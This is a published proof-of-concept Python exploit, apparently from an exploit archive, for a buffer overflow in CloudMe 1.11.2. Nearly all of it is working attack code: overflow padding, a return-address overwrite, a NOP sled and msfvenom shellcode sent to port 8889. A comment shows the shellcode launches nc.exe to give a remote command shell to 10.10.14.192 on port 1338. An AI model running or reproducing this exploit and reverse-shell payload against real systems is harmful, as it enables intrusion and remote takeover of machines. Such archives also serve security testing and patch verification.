# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

#msfvenom -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.192 1338' -b '\x00\x0A\x0D' -f python
payload =  b""
payload += b"\xb8\x17\xe4\x16\xfc\xdd\xc1\xd9\x74\x24\xf4\x5a\x29"
payload += b"\xc9\xb1\x3e\x83\xc2\x04\x31\x42\x11\x03\x42\x11\xe2"
payload += b"\xe2\x18\xfe\x7e\x0c\xe1\xff\x1e\x85\x04\xce\x1e\xf1"
payload += b"\x4d\x61\xaf\x72\x03\x8e\x44\xd6\xb0\x05\x28\xfe\xb7"
payload += b"\xae\x87\xd8\xf6\x2f\xbb\x18\x98\xb3\xc6\x4c\x7a\x8d"
payload += b"\x08\x81\x7b\xca\x75\x6b\x29\x83\xf2\xd9\xde\xa0\x4f"
payload += b"\xe1\x55\xfa\x5e\x61\x89\x4b\x60\x40\x1c\xc7\x3b\x42"
payload += b"\x9e\x04\x30\xcb\xb8\x49\x7d\x82\x33\xb9\x09\x15\x92"
payload += b"\xf3\xf2\xb9\xdb\x3b\x01\xc0\x1c\xfb\xfa\xb7\x54\xff"
payload += b"\x87\xcf\xa2\x7d\x5c\x5a\x31\x25\x17\xfc\x9d\xd7\xf4"
payload += b"\x9a\x56\xdb\xb1\xe9\x31\xf8\x44\x3e\x4a\x04\xcc\xc1"
payload += b"\x9d\x8c\x96\xe5\x39\xd4\x4d\x84\x18\xb0\x20\xb9\x7b"
payload += b"\x1b\x9c\x1f\xf7\xb6\xc9\x12\x5a\xdd\x0c\xa1\xe0\x93"
payload += b"\x0f\xb9\xea\x83\x67\x88\x61\x4c\xff\x15\xa0\x28\x0f"
payload += b"\x5c\xe9\x19\x98\x38\x7b\x18\xc5\xbb\x51\x5f\xf0\x3f"
payload += b"\x50\x20\x07\x5f\x11\x25\x43\xd8\xc9\x57\xdc\x8c\xed"
payload += b"\xc4\xdd\x85\xad\xd0\x7d\x5d\x53\x48\x0e\xed\xcf\xfa"
payload += b"\x9a\x69\x9f\x99\x11\x2d\x38\x27\xbb\x91\xb3\xa7\x2f"
payload += b"\x46\x5d\x2c\xec\xf6\xfe\x82\x69\x7e\x64\xfb\x5c\x1b"
payload += b"\x46\x98\xf3\x87\xa8\x3b\x74\x22\x95\xf2\xb4\x82\xe4"
payload += b"\xc4\x9a\xeb\x32\x0b\xd2\x32\x09\x73\x25\x77\x5e\x4b"
payload += b"\x45"

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python

overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))	

buf = padding1 + EIP + NOPS + payload + overrun 

try:
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target,8889))
	s.send(buf)
except Exception as e:
	print("RIP")